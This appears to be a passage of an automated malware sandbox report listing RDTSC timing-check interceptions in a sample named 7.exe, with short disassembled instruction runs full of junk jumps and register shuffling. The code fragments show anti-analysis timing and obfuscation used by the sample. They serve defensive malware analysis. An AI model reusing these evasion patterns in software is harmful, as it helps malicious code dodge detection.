Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B4E second address: 5600B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B52 second address: 5600B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FDB98EABA2Ah 0x0000000e push eax 0x0000000f jmp 00007FDB98EABA2Bh 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDB98EABA35h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B89 second address: 5600B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B8F second address: 5600B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B93 second address: 5600BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600BA3 second address: 5600BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600BA9 second address: 5600BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600BAF second address: 5600BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A00FC second address: 55A0100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0100 second address: 55A0106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0106 second address: 55A0117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EAF3CDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0117 second address: 55A0139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edi 0x00000011 mov bx, 0A6Ah 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A0139 second address: 55A013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A013F second address: 55A016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx ebx, cx 0x0000000d mov esi, 6E68C727h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDB98EABA39h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A016E second address: 55A0267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007FDB98EAF3D3h 0x0000000b sub ecx, 20130DCEh 0x00000011 jmp 00007FDB98EAF3D9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007FDB98EAF3CEh 0x00000021 push dword ptr [ebp+04h] 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FDB98EAF3CEh 0x0000002b or ecx, 318BA978h 0x00000031 jmp 00007FDB98EAF3CBh 0x00000036 popfd 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FDB98EAF3D6h 0x0000003e adc ecx, 605943D8h 0x00000044 jmp 00007FDB98EAF3CBh 0x00000049 popfd 0x0000004a mov bl, cl 0x0000004c popad 0x0000004d popad 0x0000004e push dword ptr [ebp+0Ch] 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007FDB98EAF3D1h 0x00000058 jmp 00007FDB98EAF3CBh 0x0000005d popfd 0x0000005e push eax 0x0000005f push ebx 0x00000060 pop esi 0x00000061 pop ebx 0x00000062 popad 0x00000063 push dword ptr [ebp+08h] 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 jmp 00007FDB98EAF3D3h 0x0000006e call 00007FDB98EAF3D8h 0x00000073 pop esi 0x00000074 popad 0x00000075 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A029A second address: 55A02BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A02BE second address: 55A02C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55A02C2 second address: 55A02D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0855 second address: 55C0873 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FDB98EAF3CFh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0873 second address: 55C0877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0877 second address: 55C0892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0564 second address: 55C056A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C056A second address: 55C056E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C020B second address: 55C0251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov ecx, 3EA181B7h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FDB98EABA2Dh 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FDB98EABA2Eh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDB98EABA37h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0EE1 second address: 55C0EFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0EFE second address: 55C0F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EABA2Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0F0E second address: 55C0F51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushfd 0x00000013 jmp 00007FDB98EAF3D1h 0x00000018 adc esi, 40EC5306h 0x0000001e jmp 00007FDB98EAF3D1h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0F51 second address: 55C0F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0F57 second address: 55C0F88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDB98EAF3D5h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0F88 second address: 55C0F98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EABA2Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0F98 second address: 55C0F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600A73 second address: 5600A79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600A79 second address: 5600A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600A7E second address: 5600B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDB98EABA34h 0x00000012 jmp 00007FDB98EABA35h 0x00000017 popfd 0x00000018 mov dx, si 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f jmp 00007FDB98EABA2Ah 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FDB98EABA2Dh 0x0000002f xor eax, 67395806h 0x00000035 jmp 00007FDB98EABA31h 0x0000003a popfd 0x0000003b call 00007FDB98EABA30h 0x00000040 pop ecx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B03 second address: 5600B09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600B09 second address: 5600B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55E0209 second address: 55E0225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EAF3D8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55E0225 second address: 55E0294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax], 00000000h 0x0000000e pushad 0x0000000f call 00007FDB98EABA2Bh 0x00000014 pushfd 0x00000015 jmp 00007FDB98EABA38h 0x0000001a adc ah, FFFFFFA8h 0x0000001d jmp 00007FDB98EABA2Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 and dword ptr [eax+04h], 00000000h 0x00000029 pushad 0x0000002a mov cx, dx 0x0000002d mov si, di 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FDB98EABA36h 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55E0294 second address: 55E02A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EAF3CEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C0427 second address: 55C042B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55C042B second address: 55C0431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55D0CB2 second address: 55D0CD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop edx 0x0000000f mov cx, C8F5h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55D0CD2 second address: 55D0CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55D0CD8 second address: 55D0CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55D0CDC second address: 55D0CEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55D0CEB second address: 55D0CFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55D0F4B second address: 55D0F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55D0F51 second address: 55D0F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55D0F68 second address: 55D0F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55D0F6C second address: 55D0F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55D0F70 second address: 55D0F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 560024C second address: 5600252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600252 second address: 5600263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EAF3CDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600263 second address: 5600291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FDB98EABA2Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FDB98EABA30h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600291 second address: 5600295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600295 second address: 560029B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 560029B second address: 56002C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDB98EAF3CCh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 56002C3 second address: 560030B instructions: 0x00000000 rdtsc 0x00000002 call 00007FDB98EABA32h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007FDB98EABA2Bh 0x00000010 xor ch, FFFFFFEEh 0x00000013 jmp 00007FDB98EABA39h 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 560030B second address: 560030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 560030F second address: 5600315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600315 second address: 56003AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov ax, AAF3h 0x0000000f pushfd 0x00000010 jmp 00007FDB98EAF3D8h 0x00000015 xor si, C3F8h 0x0000001a jmp 00007FDB98EAF3CBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [778165FCh] 0x00000026 pushad 0x00000027 mov cl, 15h 0x00000029 jmp 00007FDB98EAF3D1h 0x0000002e popad 0x0000002f test eax, eax 0x00000031 jmp 00007FDB98EAF3CEh 0x00000036 je 00007FDC0B0429A3h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push ebx 0x00000040 pop esi 0x00000041 jmp 00007FDB98EAF3D9h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 56003AE second address: 56003D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 79088D32h 0x00000008 mov ax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDB98EABA37h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 56003D9 second address: 56003DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 56003DD second address: 56003E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 56003E3 second address: 5600424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 pushfd 0x00000006 jmp 00007FDB98EAF3CEh 0x0000000b and ah, FFFFFFA8h 0x0000000e jmp 00007FDB98EAF3CBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor eax, dword ptr [ebp+08h] 0x0000001a jmp 00007FDB98EAF3CFh 0x0000001f and ecx, 1Fh 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600424 second address: 560042A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 560042A second address: 5600434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 65DE297Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600434 second address: 560045C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 ror eax, cl 0x00000009 jmp 00007FDB98EABA30h 0x0000000e leave 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDB98EABA2Ah 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 560045C second address: 5600462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600462 second address: 5600468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 5600468 second address: 560046C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 560046C second address: 56004B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f mov esi, eax 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 xor esi, dword ptr [00CB2014h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007FDB9D83BEE3h 0x00000026 push FFFFFFFEh 0x00000028 jmp 00007FDB98EABA30h 0x0000002d pop eax 0x0000002e pushad 0x0000002f mov cl, 96h 0x00000031 mov dh, 9Ah 0x00000033 popad 0x00000034 ret 0x00000035 nop 0x00000036 push eax 0x00000037 call 00007FDB9D83BEF6h 0x0000003c mov edi, edi 0x0000003e pushad 0x0000003f mov ah, ABh 0x00000041 popad 0x00000042 xchg eax, ebp 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 mov cx, FA21h 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 56004B5 second address: 5600560 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDB98EAF3CEh 0x00000008 and ecx, 14553BB8h 0x0000000e jmp 00007FDB98EAF3CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FDB98EAF3D8h 0x0000001c and esi, 6ED8F618h 0x00000022 jmp 00007FDB98EAF3CBh 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FDB98EAF3D5h 0x00000032 adc si, D7B6h 0x00000037 jmp 00007FDB98EAF3D1h 0x0000003c popfd 0x0000003d pushad 0x0000003e popad 0x0000003f popad 0x00000040 mov ebx, ecx 0x00000042 popad 0x00000043 xchg eax, ebp 0x00000044 jmp 00007FDB98EAF3D8h 0x00000049 mov ebp, esp 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e mov ch, bh 0x00000050 mov dx, cx 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B002D second address: 55B0042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0042 second address: 55B0052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EAF3CCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B0052 second address: 55B00B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FDB98EABA37h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 movzx ecx, bx 0x00000014 mov dx, F3E4h 0x00000018 popad 0x00000019 and esp, FFFFFFF8h 0x0000001c jmp 00007FDB98EABA33h 0x00000021 xchg eax, ecx 0x00000022 jmp 00007FDB98EABA36h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B00B1 second address: 55B00B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B00B5 second address: 55B00B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: 55B00B9 second address: 55B00BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
